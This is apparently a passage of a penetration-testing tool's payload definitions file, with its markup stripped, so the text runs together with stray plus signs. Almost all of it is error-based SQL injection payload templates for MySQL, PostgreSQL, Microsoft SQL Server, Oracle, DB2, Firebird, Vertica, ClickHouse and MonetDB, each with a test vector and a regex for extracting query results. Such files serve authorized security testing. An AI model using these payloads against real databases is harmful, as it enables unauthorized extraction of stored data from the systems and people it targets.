+ + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT) + 2 + 2 + 1 + 1,8,9 + 1 + AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT) + 2 + 3 + 3 + 1,8,9 + 2 + OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT) + 2 + 2 + 1 + 1,8,9 + 1 + AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') + + AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT) + 2 + 3 + 3 + 1,8,9 + 2 + OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') + + OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle AND error-based - WHERE or HAVING clause (XMLType) + 2 + 1 + 1 + 1,9 + 1 + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle OR error-based - WHERE or HAVING clause (XMLType) + 2 + 1 + 3 + 1,9 + 2 + OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) + 2 + 2 + 1 + 1,9 + 1 + AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle + >= 8.1.6 +
+
+ + + Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) + 2 + 2 + 3 + 1,9 + 2 + OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle + >= 8.1.6 +
+
+ + + Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) + 2 + 3 + 1 + 1,9 + 1 + AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) + 2 + 3 + 3 + 1,9 + 2 + OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH) + 2 + 4 + 1 + 1,9 + 1 + AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH) + 2 + 4 + 3 + 1,9 + 2 + OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Firebird AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + Firebird OR error-based - WHERE or HAVING clause + 2 + 4 + 3 + 1 + 2 + OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + MonetDB AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MonetDB +
+
+ + + MonetDB OR error-based - WHERE or HAVING clause + 2 + 4 + 3 + 1 + 2 + OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MonetDB +
+
+ + + Vertica AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC) + + AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Vertica +
+
+ + + Vertica OR error-based - WHERE or HAVING clause + 2 + 4 + 3 + 1 + 2 + OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC) + + OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Vertica +
+
+ + + IBM DB2 AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + IBM DB2 OR error-based - WHERE or HAVING clause + 2 + 4 + 3 + 1 + 1 + OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + 2 + 3 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+
+ + + ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + 2 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+
+ + + + + + + MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) + 2 + 2 + 1 + 1,2,3,4,5 + 1 + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1) + + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + + + MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED) + 2 + 5 + 1 + 1,2,3,9 + 3 + (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.5 error-based - Parameter replace (EXP) + 2 + 5 + 1 + 1,2,3,9 + 3 + EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) + + EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET) + 2 + 3 + 1 + 1,2,3,9 + 3 + GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + + MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS) + 2 + 5 + 1 + 1,2,3,9 + 3 + JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) + + JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.7.8 +
+
+ + + MySQL >= 5.0 error-based - Parameter replace (FLOOR) + 2 + 4 + 1 + 1,2,3,9 + 3 + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) + 2 + 4 + 1 + 1,2,3,9 + 3 + (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])) + + + (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE) + 2 + 2 + 1 + 1,2,3,9 + 3 + (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))) + + + (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + PostgreSQL error-based - Parameter replace + 2 + 2 + 1 + 1,2,3,9 + 3 + (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) + + (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + PostgreSQL error-based - Parameter replace (GENERATE_SERIES) + 2 + 5 + 1 + 1,2,3,9 + 3 + (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) + + (CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase error-based - Parameter replace + 2 + 3 + 1 + 1,3 + 3 + (CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))) + + (CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase error-based - Parameter replace (integer column) + 2 + 4 + 1 + 1,3 + 3 + (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]') + + (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle error-based - Parameter replace + 2 + 3 + 1 + 1,3 + 3 + (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Firebird error-based - Parameter replace + 2 + 4 + 1 + 1,3 + 3 + (SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')) + + (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + IBM DB2 error-based - Parameter replace + 2 + 4 + 1 + 1,3 + 3 + RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + + + MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x) + + ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)))s) + + ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)))s) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET) + 2 + 3 + 1 + 2,3 + 1 + ,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + ,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + + MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))))x) + + ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))))x) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.7.8 +
+
+ + + MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE) + 2 + 3 + 1 + 2,3 + 1 + ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) + + ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML) + 2 + 5 + 1 + 2,3 + 1 + ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) + + ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s) + + ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 4.1 +
+
+ + + PostgreSQL error-based - ORDER BY, GROUP BY clause + 2 + 3 + 1 + 2,3 + 1 + ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) + + ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES) + 2 + 5 + 1 + 2,3 + 1 + ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) + + ,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase error-based - ORDER BY clause + 2 + 4 + 1 + 3 + 1 + ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))) + + ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle error-based - ORDER BY, GROUP BY clause + 2 + 4 + 1 + 2,3 + 1 + ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Firebird error-based - ORDER BY clause + 2 + 5 + 1 + 3 + 1 + ,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')) + + ,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
